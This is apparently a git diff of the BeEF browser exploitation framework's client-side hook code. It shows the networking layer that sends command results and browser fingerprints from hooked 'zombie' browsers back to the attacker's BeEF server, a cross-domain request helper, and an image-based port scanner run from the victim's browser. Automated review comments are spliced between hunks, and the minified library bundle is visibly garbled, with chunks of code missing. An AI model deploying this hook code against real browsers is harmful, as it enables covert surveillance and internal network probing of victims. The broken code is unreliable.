b/core/main/client/lib/evercookie.js 
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
 * evercookie 0.4 (10/13/2010) -- extremely persistent cookies
 *
diff --git a/core/main/client/lib/jools.min.js b/core/main/client/lib/jools.min.js
new file mode 100644
index 000000000..daf16b60d
--- /dev/null
+++ b/core/main/client/lib/jools.min.js
@@ -0,0 +1 @@ +var require=function(file,cwd){var resolved=require.resolve(file,cwd||"/");var mod=require.modules[resolved];if(!mod){throw new Error("Failed to resolve module "+file+", tried "+resolved)}var res=mod._cached?mod._cached:mod();return res};require.paths=[];require.modules={};require.extensions=[".js",".coffee"];require._core={assert:true,events:true,fs:true,path:true,vm:true};require.resolve=(function(){return function(x,cwd){if(!cwd){cwd="/"}if(require._core[x]){return x}var path=require.modules.path();cwd=path.resolve("/",cwd);var y=cwd||"/";if(x.match(/^(?:\.\.?\/|\/)/)){var m=loadAsFileSync(path.resolve(y,x))||loadAsDirectorySync(path.resolve(y,x));if(m){return m}}var n=loadNodeModulesSync(x,y);if(n){return n}throw new Error("Cannot find module '"+x+"'");function loadAsFileSync(x){if(require.modules[x]){return x}for(var i=0;i=0;i--){if(parts[i]==="node_modules"){continue}var dir=parts.slice(0,i+1).join("/")+"/node_modules";dirs.push(dir)}return dirs}}})();require.alias=function(from,to){var path=require.modules.path();var res=null;try{res=require.resolve(from+"/package.json","/")}catch(err){res=require.resolve(from,"/")}var basedir=path.dirname(res);var keys=(Object.keys||function(obj){var res=[];for(var key in obj){res.push(key)}return res})(require.modules);for(var i=0;i0){var fn=queue.shift();fn()}}},true)}return function(fn){if(canPost){queue.push(fn);window.postMessage("browserify-tick","*")}else{setTimeout(fn,0)}}})()}if(!process.title){process.title="browser"}if(!process.binding){process.binding=function(name){if(name==="evals"){return require("vm")}else{throw new Error("No such module")}}}if(!process.cwd){process.cwd=function(){return"."}}if(!process.env){process.env={}}if(!process.argv){process.argv=[]}require.define("path",function(require,module,exports,__dirname,__filename){function filter(xs,fn){var res=[];for(var i=0;i=0;i--){var 
last=parts[i];if(last=="."){parts.splice(i,1)}else{if(last===".."){parts.splice(i,1);up++}else{if(up){parts.splice(i,1);up--}}}}if(allowAboveRoot){for(;up--;up){parts.unshift("..")}}return parts}var splitPathRe=/^(.+\/(?!$)|\/)?((?:.+?)?(\.[^.]*)?)$/;exports.resolve=function(){var resolvedPath="",resolvedAbsolute=false;for(var i=arguments.length;i>=-1&&!resolvedAbsolute;i--){var path=(i>=0)?arguments[i]:process.cwd();if(typeof path!=="string"||!path){continue}resolvedPath=path+"/"+resolvedPath;resolvedAbsolute=path.charAt(0)==="/"}resolvedPath=normalizeArray(filter(resolvedPath.split("/"),function(p){return !!p}),!resolvedAbsolute).join("/");return((resolvedAbsolute?"/":"")+resolvedPath)||"."};exports.normalize=function(path){var isAbsolute=path.charAt(0)==="/",trailingSlash=path.slice(-1)==="/";path=normalizeArray(filter(path.split("/"),function(p){return !!p}),!isAbsolute).join("/");if(!path&&!isAbsolute){path="."}if(path&&trailingSlash){path+="/"}return(isAbsolute?"/":"")+path};exports.join=function(){var paths=Array.prototype.slice.call(arguments,0);return exports.normalize(filter(paths,function(p,index){return p&&typeof p==="string"}).join("/"))};exports.dirname=function(path){var dir=splitPathRe.exec(path)[1]||"";var isWindows=false;if(!dir){return"."}else{if(dir.length===1||(isWindows&&dir.length<=3&&dir.charAt(1)===":")){return dir}else{return dir.substring(0,dir.length-1)}}};exports.basename=function(path,ext){var f=splitPathRe.exec(path)[2]||"";if(ext&&f.substr(-1*ext.length)===ext){f=f.substr(0,f.length-ext.length)}return f};exports.extname=function(path){return splitPathRe.exec(path)[3]||""}});require.define("/node_modules/jools/package.json",function(require,module,exports,__dirname,__filename){module.exports={main:"./lib/jools"}});require.define("/node_modules/jools/lib/jools.js",function(require,module,exports,__dirname,__filename){var utils=require("./utils"),_=require("underscore");exports.version="0.0.1";function 
Jools(rules){this.rules=rules}Jools.prototype.execute=function(fact){var self=this,session=_.clone(fact),last_session=_.clone(fact),goal=false;while(!goal){var changes=false;for(var x=0;x2;if(obj==null){obj=[]}if(nativeReduce&&obj.reduce===nativeReduce){if(context){iterator=_.bind(iterator,context)}return initial?obj.reduce(iterator,memo):obj.reduce(iterator)}each(obj,function(value,index,list){if(!initial){memo=value;initial=true}else{memo=iterator.call(context,memo,value,index,list)}});if(!initial){throw new TypeError("Reduce of empty array with no initial value")}return memo};_.reduceRight=_.foldr=function(obj,iterator,memo,context){var initial=arguments.length>2;if(obj==null){obj=[]}if(nativeReduceRight&&obj.reduceRight===nativeReduceRight){if(context){iterator=_.bind(iterator,context)}return initial?obj.reduceRight(iterator,memo):obj.reduceRight(iterator)}var reversed=_.toArray(obj).reverse();if(context&&!initial){iterator=_.bind(iterator,context)}return initial?_.reduce(reversed,iterator,memo,context):_.reduce(reversed,iterator)};_.find=_.detect=function(obj,iterator,context){var result;any(obj,function(value,index,list){if(iterator.call(context,value,index,list)){result=value;return true}});return result};_.filter=_.select=function(obj,iterator,context){var results=[];if(obj==null){return results}if(nativeFilter&&obj.filter===nativeFilter){return obj.filter(iterator,context)}each(obj,function(value,index,list){if(iterator.call(context,value,index,list)){results[results.length]=value}});return results};_.reject=function(obj,iterator,context){var results=[];if(obj==null){return results}each(obj,function(value,index,list){if(!iterator.call(context,value,index,list)){results[results.length]=value}});return results};_.every=_.all=function(obj,iterator,context){var result=true;if(obj==null){return result}if(nativeEvery&&obj.every===nativeEvery){return 
obj.every(iterator,context)}each(obj,function(value,index,list){if(!(result=result&&iterator.call(context,value,index,list))){return breaker}});return !!result};var any=_.some=_.any=function(obj,iterator,context){iterator||(iterator=_.identity);var result=false;if(obj==null){return result}if(nativeSome&&obj.some===nativeSome){return obj.some(iterator,context)}each(obj,function(value,index,list){if(result||(result=iterator.call(context,value,index,list))){return breaker}});return !!result};_.include=_.contains=function(obj,target){var found=false;if(obj==null){return found}if(nativeIndexOf&&obj.indexOf===nativeIndexOf){return obj.indexOf(target)!=-1}found=any(obj,function(value){return value===target});return found};_.invoke=function(obj,method){var args=slice.call(arguments,2);return _.map(obj,function(value){return(_.isFunction(method)?method||value:value[method]).apply(value,args)})};_.pluck=function(obj,key){return _.map(obj,function(value){return value[key]})};_.max=function(obj,iterator,context){if(!iterator&&_.isArray(obj)&&obj[0]===+obj[0]){return Math.max.apply(Math,obj)}if(!iterator&&_.isEmpty(obj)){return -Infinity}var result={computed:-Infinity};each(obj,function(value,index,list){var computed=iterator?iterator.call(context,value,index,list):value;computed>=result.computed&&(result={value:value,computed:computed})});return result.value};_.min=function(obj,iterator,context){if(!iterator&&_.isArray(obj)&&obj[0]===+obj[0]){return Math.min.apply(Math,obj)}if(!iterator&&_.isEmpty(obj)){return Infinity}var result={computed:Infinity};each(obj,function(value,index,list){var computed=iterator?iterator.call(context,value,index,list):value;computedb?1:0}),"value")};_.groupBy=function(obj,val){var result={};var iterator=_.isFunction(val)?val:function(obj){return obj[val]};each(obj,function(value,index){var key=iterator(value,index);(result[key]||(result[key]=[])).push(value)});return 
result};_.sortedIndex=function(array,obj,iterator){iterator||(iterator=_.identity);var low=0,high=array.length;while(low>1;iterator(array[mid])=0})})};_.difference=function(array){var rest=_.flatten(slice.call(arguments,1),true);return _.filter(array,function(value){return !_.include(rest,value)})};_.zip=function(){var args=slice.call(arguments);var length=_.max(_.pluck(args,"length"));var results=new Array(length);for(var i=0;i=0;i--){args=[funcs[i].apply(this,args)]}return args[0]}};_.after=function(times,func){if(times<=0){return func()}return function(){if(--times<1){return func.apply(this,arguments)}}};_.keys=nativeKeys||function(obj){if(obj!==Object(obj)){throw new TypeError("Invalid object")}var keys=[];for(var key in obj){if(_.has(obj,key)){keys[keys.length]=key}}return keys};_.values=function(obj){return _.map(obj,_.identity)};_.functions=_.methods=function(obj){var names=[];for(var key in obj){if(_.isFunction(obj[key])){names.push(key)}}return names.sort()};_.extend=function(obj){each(slice.call(arguments,1),function(source){for(var prop in source){obj[prop]=source[prop]}});return obj};_.pick=function(obj){var result={};each(_.flatten(slice.call(arguments,1)),function(key){if(key in obj){result[key]=obj[key]}});return result};_.defaults=function(obj){each(slice.call(arguments,1),function(source){for(var prop in source){if(obj[prop]==null){obj[prop]=source[prop]}}});return obj};_.clone=function(obj){if(!_.isObject(obj)){return obj}return _.isArray(obj)?obj.slice():_.extend({},obj)};_.tap=function(obj,interceptor){interceptor(obj);return obj};function eq(a,b,stack){if(a===b){return a!==0||1/a==1/b}if(a==null||b==null){return a===b}if(a._chain){a=a._wrapped}if(b._chain){b=b._wrapped}if(a.isEqual&&_.isFunction(a.isEqual)){return a.isEqual(b)}if(b.isEqual&&_.isFunction(b.isEqual)){return b.isEqual(a)}var className=toString.call(a);if(className!=toString.call(b)){return false}switch(className){case"[object String]":return a==String(b);case"[object 
Number]":return a!=+a?b!=+b:(a==0?1/a==1/b:a==+b);case"[object Date]":case"[object Boolean]":return +a==+b;case"[object RegExp]":return a.source==b.source&&a.global==b.global&&a.multiline==b.multiline&&a.ignoreCase==b.ignoreCase}if(typeof a!="object"||typeof b!="object"){return false}var length=stack.length;while(length--){if(stack[length]==a){return true}}stack.push(a);var size=0,result=true;if(className=="[object Array]"){size=a.length;result=size==b.length;if(result){while(size--){if(!(result=size in a==size in b&&eq(a[size],b[size],stack))){break}}}}else{if("constructor" in a!="constructor" in b||a.constructor!=b.constructor){return false}for(var key in a){if(_.has(a,key)){size++;if(!(result=_.has(b,key)&&eq(a[key],b[key],stack))){break}}}if(result){for(key in b){if(_.has(b,key)&&!(size--)){break}}result=!size}}stack.pop();return result}_.isEqual=function(a,b){return eq(a,b,[])};_.isEmpty=function(obj){if(obj==null){return true}if(_.isArray(obj)||_.isString(obj)){return obj.length===0}for(var key in obj){if(_.has(obj,key)){return false}}return true};_.isElement=function(obj){return !!(obj&&obj.nodeType==1)};_.isArray=nativeIsArray||function(obj){return toString.call(obj)=="[object Array]"};_.isObject=function(obj){return obj===Object(obj)};_.isArguments=function(obj){return toString.call(obj)=="[object Arguments]"};if(!_.isArguments(arguments)){_.isArguments=function(obj){return !!(obj&&_.has(obj,"callee"))}}_.isFunction=function(obj){return toString.call(obj)=="[object Function]"};_.isString=function(obj){return toString.call(obj)=="[object String]"};_.isNumber=function(obj){return toString.call(obj)=="[object Number]"};_.isFinite=function(obj){return _.isNumber(obj)&&isFinite(obj)};_.isNaN=function(obj){return obj!==obj};_.isBoolean=function(obj){return obj===true||obj===false||toString.call(obj)=="[object Boolean]"};_.isDate=function(obj){return toString.call(obj)=="[object Date]"};_.isRegExp=function(obj){return toString.call(obj)=="[object 
RegExp]"};_.isNull=function(obj){return obj===null};_.isUndefined=function(obj){return obj===void 0};_.has=function(obj,key){return hasOwnProperty.call(obj,key)};_.noConflict=function(){root._=previousUnderscore;return this};_.identity=function(value){return value};_.times=function(n,iterator,context){for(var i=0;i/g,">").replace(/"/g,""").replace(/'/g,"'").replace(/\//g,"/")};_.result=function(object,property){if(object==null){return null}var value=object[property];return _.isFunction(value)?value.call(object):value};_.mixin=function(obj){each(_.functions(obj),function(name){addToWrapper(name,_[name]=obj[name])})};var idCounter=0;_.uniqueId=function(prefix){var id=idCounter++;return prefix?prefix+id:id};_.templateSettings={evaluate:/<::([\s\S]+?)::>/g,interpolate:/<::=([\s\S]+?)::>/g,escape:/<:-([\s\S]+?):>/g};var noMatch=/.^/;var escapes={"\\":"\\","'":"'",r:"\r",n:"\n",t:"\t",u2028:"\u2028",u2029:"\u2029"};for(var p in escapes){escapes[escapes[p]]=p}var escaper=/\\|'|\r|\n|\t|\u2028|\u2029/g;var unescaper=/\\(\\|'|r|n|t|u2028|u2029)/g;var unescape=function(code){return code.replace(unescaper,function(match,escape){return escapes[escape]})};_.template=function(text,data,settings){settings=_.defaults(settings||{},_.templateSettings);var source="__p+='"+text.replace(escaper,function(match){return"\\"+escapes[match]}).replace(settings.escape||noMatch,function(match,code){return"'+\n_.escape("+unescape(code)+")+\n'"}).replace(settings.interpolate||noMatch,function(match,code){return"'+\n("+unescape(code)+")+\n'"}).replace(settings.evaluate||noMatch,function(match,code){return"';\n"+unescape(code)+"\n;__p+='"})+"';\n";if(!settings.variable){source="with(obj||{}){\n"+source+"}\n"}source="var __p='';var print=function(){__p+=Array.prototype.join.call(arguments, '')};\n"+source+"return __p;\n";var render=new Function(settings.variable||"obj","_",source);if(data){return render(data,_)}var template=function(data){return 
render.call(this,data,_)};template.source="function("+(settings.variable||"obj")+"){\n"+source+"}";return template};_.chain=function(obj){return _(obj).chain()};var wrapper=function(obj){this._wrapped=obj};_.prototype=wrapper.prototype;var result=function(obj,chain){return chain?_(obj).chain():obj};var addToWrapper=function(name,func){wrapper.prototype[name]=function(){var args=slice.call(arguments);unshift.call(args,this._wrapped);return result(func.apply(_,args),this._chain)}};_.mixin(_);each(["pop","push","reverse","shift","sort","splice","unshift"],function(name){var method=ArrayProto[name];wrapper.prototype[name]=function(){var wrapped=this._wrapped;method.apply(wrapped,arguments);var length=wrapped.length;if((name=="shift"||name=="splice")&&length===0){delete wrapped[0]}return result(wrapped,this._chain)}});each(["concat","join","slice"],function(name){var method=ArrayProto[name];wrapper.prototype[name]=function(){return result(method.apply(this._wrapped,arguments),this._chain)}});wrapper.prototype.chain=function(){this._chain=true;return this};wrapper.prototype.value=function(){return this._wrapped}}).call(this)}); \ No newline at end of file diff --git a/core/main/client/logger.js b/core/main/client/logger.js index 5c3c6e2b5..3d1217c37 100644 --- a/core/main/client/logger.js +++ b/core/main/client/logger.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.logger * diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js index 626b36ce8..6d2229693 100644 --- a/core/main/client/mitb.js +++ b/core/main/client/mitb.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.mitb = { cid:null, diff --git a/core/main/client/net.js b/core/main/client/net.js index 66daf0245..62c98a8ac 100644 --- a/core/main/client/net.js 
+++ b/core/main/client/net.js @@ -1,35 +1,37 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.net * - * Provides basic networking functions. + * Provides basic networking functions, + * like beef.net.request and beef.net.forgeRequest, + * used by BeEF command modules and the Requester extension, + * as well as beef.net.send which is used to return commands + * to BeEF server-side components. + * + * Also, it contains the core methods used by the XHR-polling + * mechanism (flush, queue) */ beef.net = { host:"<%= @beef_host %>", port:"<%= @beef_port %>", hook:"<%= @beef_hook %>", + httpproto:"<%= @beef_proto %>", handler:'/dh', chop:500, pad:30, //this is the amount of padding for extra params such as pc, pid and sid sid_count:0, cmd_queue:[], - //Command object + /** + * Command object. This represents the data to be sent back to BeEF, + * using the beef.net.send() method. + */ command:function () { this.cid = null; this.results = null; 
@@ -37,13 +39,17 @@ beef.net = { this.callback = null; }, - //Packet object + /** + * Packet object. A single chunk of data. X packets -> 1 stream + */ packet:function () { this.id = null; this.data = null; }, - //Stream object + /** + * Stream object. Contains X packets, which are command result chunks. + */ stream:function () { this.id = null; this.packets = []; @@ -59,7 +65,8 @@ beef.net = { /** * Response Object - used in the beef.net.request callback - * Note: as we are using async mode, the response object will be empty if returned.Using sync mode, request obj fields will be populated. + * NOTE: as we are using async mode, the response object will be empty if returned. + * Using sync mode, request obj fields will be populated. */ response:function () { this.status_code = null; // 500, 404, 200, 302 @@ -72,7 +79,13 @@ beef.net = { this.headers = null; // full response headers }, - //Queues the command, to be sent back to the framework on the next refresh + /** + * Queues the specified command results. + * @param: {String} handler: the server-side handler that will be called + * @param: {Integer} cid: command id + * @param: {String} results: the data to send + * @param: {Function} callback: the function to call after execution + */ queue:function (handler, cid, results, callback) { if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) { var s = new beef.net.command(); 
@@ -84,26 +97,40 @@ beef.net = { } }, - //Queues the current command and flushes the queue straight away + /** + * Queues the current command results and flushes the queue straight away. + * NOTE: Always send Browser Fingerprinting results + * (beef.net.browser_details(); -> /init handler) using normal XHR-polling, + * even if WebSockets are enabled. + * @param: {String} handler: the server-side handler that will be called + * @param: {Integer} cid: command id + * @param: {String} results: the data to send + * @param: {Function} callback: the function to call after execution + */ send:function (handler, cid, results, callback) { - if (typeof beef.websocket === "undefined") { + if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) { this.queue(handler, cid, results, callback); this.flush(); - } - else { + }else { try { beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid + '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) + '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }'); - } - catch (e) { + }catch (e) { this.queue(handler, cid, results, callback); this.flush(); - } + } } }, - //Flush all currently queued commands to the framework + /** + * Flush all currently queued command results to the framework, + * chopping the data in chunks ('chunk' method) which will be re-assembled + * server-side by the network stack. + * NOTE: currently 'flush' is used only with the default + * XHR-polling mechanism. If WebSockets are used, the data is sent + * back to BeEF straight away. + */ flush:function () { if (this.cmd_queue.length > 0) { var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue)); 
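Review bot: The WebSocket branch of `send` builds its JSON frame by string concatenation, so `handler` and the stringified `callback` are inserted unescaped; the new doc block types `callback` as a Function, and concatenating a function embeds its source text, quotes included, which can yield an invalid frame. Building a plain object and serialising it once with `beef.encode.json.stringify`, the helper already used on that line, removes the manual quoting. The new guard also mixes `handler === "/init"` with the loose `cid == 0`; `queue` requires `typeof(cid) === 'number'`, so `cid === 0` is the consistent test. The body of `flush` continues outside the hunk.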
@@ -127,22 +154,30 @@ beef.net = { } }, - //Split string into chunk lengths determined by amount + /** + * Split the input data into chunk lengths determined by the amount parameter. + * @param: {String} str: the input data + * @param: {Integer} amount: chunk length + */ chunk:function (str, amount) { if (typeof amount == 'undefined') n = 2; return str.match(RegExp('.{1,' + amount + '}', 'g')); }, - //Push packets to framework + /** + * Push the input stream back to the BeEF server-side components. + * It uses beef.net.request to send back the data. + * @param: {Object} stream: the stream object to be sent back. + */ push:function (stream) { //need to implement wait feature here eventually for (var i = 0; i < stream.pc; i++) { - this.request(this.port == '443' ? 'https' : 'http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null); + this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null); } }, /** - *Performs http requests + * Performs http requests * @param: {String} scheme: HTTP or HTTPS * @param: {String} method: GET or POST * @param: {String} domain: bindshell.net, 192.168.3.4, etc @@ -201,13 +236,12 @@ beef.net = { data:data, timeout:(timeout * 1000), - //needed otherwise jQuery always add Content-type: application/xml, even if data is populated + //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated. beforeSend:function (xhr) { if (method == "POST") { xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8"); } }, - success:function (data, textStatus, xhr) { var end_time = new Date().getTime(); response.status_code = xhr.status; 
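Review bot: In `chunk`, the default is assigned to an undeclared `n` instead of the parameter: `if (typeof amount == 'undefined') n = 2;` leaves `amount` undefined, so the pattern becomes `.{1,undefined}` and an implicit global `n` is created. The line should read `if (typeof amount == 'undefined') amount = 2;`. The new doc block could also state the return value: `str.match` returns an array of chunks, or `null` when nothing matches (an empty string, for example), which callers need to handle.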
@@ -248,9 +282,11 @@ beef.net = { }, /* - * Similar to this.request, except from a few things that are needed when dealing with forged requests: + * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests: * - requestid: needed on the callback * - allowCrossDomain: set cross-domain requests as allowed or blocked + * + * forge_request is used mainly by the Requester and Tunneling Proxy Extensions. */ forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) { @@ -293,14 +329,21 @@ beef.net = { return response; } - // build and execute the request - if (method == "POST") { + /* + * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script': + * This will turn POSTs into GETs for remote-domain requests. + */ + if (method == "POST"){ $j.ajaxSetup({ - data:data + dataType: dataType + }); + } else { + $j.ajaxSetup({ + dataType: 'script' }); } - // this is required for bugs in IE so data can be transfered back to the server + // this is required for bugs in IE so data can be transferred back to the server if ( beef.browser.isIE() ) { dataType = 'script' } @@ -311,9 +354,7 @@ beef.net = { headers: headers, timeout: (timeout * 1000), - // needed otherwise jQuery always adds: - // Content-type: application/xml - // even if data is populated + //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated. beforeSend:function (xhr) { if (method == "POST") { xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8"); @@ -415,7 +456,9 @@ beef.net = { return false; }, - //Sends back browser details to framework + /** + * Sends back browser details to framework, calling beef.browser.getDetails() + */ browser_details:function () { var details = beef.browser.getDetails(); details['HookSessionID'] = beef.session.get_hook_session_id(); 
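Review bot: `$j.ajaxSetup` in `forge_request` changes the default `dataType` for every later `$j.ajax` call on the page, not only this request, and for non-POST methods it sets `'script'`, which makes jQuery evaluate the response body as JavaScript. The IE override `dataType = 'script'` runs after the setup call, so on IE the global default set for POST and the local variable can disagree. Passing `dataType: dataType` in the per-request options of the `$j.ajax({...})` call (its start is outside this hunk) keeps the setting local; if a global default is really intended, the comment should say so and explain why.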
diff --git a/core/main/client/net/cors.js b/core/main/client/net/cors.js
new file mode 100644
index 000000000..01cf86008
--- /dev/null
+++ b/core/main/client/net/cors.js
@@ -0,0 +1,77 @@
+beef.net.cors = {
+
+ handler: "cors",
+
+ /**
+ * Response Object - used in the beef.net.request callback
+ */
+ response:function () {
+ this.status = null; // 500, 404, 200, 302, etc
+ this.headers = null; // full response headers
+ this.body = null; // full response body
+ },
+
+ /**
+ * Make a cross-domain request using CORS
+ *
+ * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
+ * @param url {String} url
+ * @param data {String} request body
+ * @param callback {Function} function to callback on completion
+ */
+ request: function(method, url, data, callback) {
+
+ var xhr;
+ var response = new this.response;
+
+ if (XMLHttpRequest) {
+ xhr = new XMLHttpRequest();
+
+ if ('withCredentials' in xhr) {
+ xhr.open(method, url, true);
+ xhr.onerror = function() {
+ };
+ xhr.onreadystatechange = function() {
+ if (xhr.readyState === 4) {
+ response.headers = this.getAllResponseHeaders()
+ response.body = this.responseText;
+ response.status = this.status;
+ if (!!callback) {
+ if (!!response) {
+ callback(response);
+ } else {
+ callback('ERROR: No Response. CORS requests may be denied for this resource.')
+ }
+ }
+ }
+ };
+ xhr.send(data);
+ }
+ } else if (typeof XDomainRequest != "undefined") {
+ xhr = new XDomainRequest();
+ xhr.open(method, url);
+ xhr.onerror = function() {
+ };
+ xhr.onload = function() {
+ response.headers = this.getAllResponseHeaders()
+ response.body = this.responseText;
+ response.status = this.status;
+ if (!!callback) {
+ if (!!response) {
+ callback(response);
+ } else {
+ callback('ERROR: No Response. CORS requests may be denied for this resource.')
+ }
+ }
+ };
+ xhr.send(data);
+ } else {
+ if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.');
+ }
+
+ }
+
+};
+
+beef.regCmp('beef.net.cors');
+
diff --git a/core/main/client/net/dns.js b/core/main/client/net/dns.js
index e2f2b8b5c..698b0301b 100644
--- a/core/main/client/net/dns.js
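Review bot: The `XDomainRequest` fallback in `request` is only reachable when `XMLHttpRequest` is falsy, but a browser that has `XMLHttpRequest` without `withCredentials` enters the first branch, skips the inner `if`, and returns without ever calling `callback`. Folding the feature test into the outer condition, `if (typeof XMLHttpRequest !== "undefined" && 'withCredentials' in new XMLHttpRequest()) {`, lets the `else if` run and also avoids a ReferenceError where the bare identifier is undeclared. `!!response` is always true because `response` is an object created at the top of the function, so the 'No Response' message is dead code, and both `onerror` handlers are empty, so a failed request never reaches the caller; invoking `callback` with the error from `onerror` would close that gap. As far as I know `XDomainRequest` exposes neither `getAllResponseHeaders()` nor `status`, so the `onload` handler should be verified on a browser that takes that branch. The doc comment on `response` still names `beef.net.request`, apparently copied from net.js.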
+++ b/core/main/client/net/dns.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.net.dns * diff --git a/core/main/client/net/local.js b/core/main/client/net/local.js index 5aa7087ec..545ba8105 100644 --- a/core/main/client/net/local.js +++ b/core/main/client/net/local.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.net.local * 
diff --git a/core/main/client/net/portscanner.js b/core/main/client/net/portscanner.js index 75baede99..caa0131eb 100644 --- a/core/main/client/net/portscanner.js +++ b/core/main/client/net/portscanner.js 
@@ -1,63 +1,54 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/*! - * @literal object: beef.net.portscanner - * - * Provides port scanning functions for the zombie. A mod of pdp's scanner - * - * Version: '0.1', - * author: 'Petko Petkov', - * homepage: 'http://www.gnucitizen.org' - */ - -beef.net.portscanner = { - - scanPort: function(callback, target, port, timeout) - { - var timeout = (timeout == null)?100:timeout; - var img = new Image(); - - img.onerror = function () { - if (!img) return; - img = undefined; - callback(target, port, 'open'); - }; - - img.onload = img.onerror; - - img.src = 'http://' + target + ':' + port; - - setTimeout(function () { - if (!img) return; - img = undefined; - callback(target, port, 'closed'); - }, timeout); - - }, - - scanTarget: function(callback, target, ports_str, timeout) - { - var ports = ports_str.split(","); - - for (index = 0; index < ports.length; index++) { - this.scanPort(callback, target, ports[index], timeout); - }; - - } -}; - -beef.regCmp('beef.net.portscanner'); - +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/*! + * @literal object: beef.net.portscanner + * + * Provides port scanning functions for the zombie. 
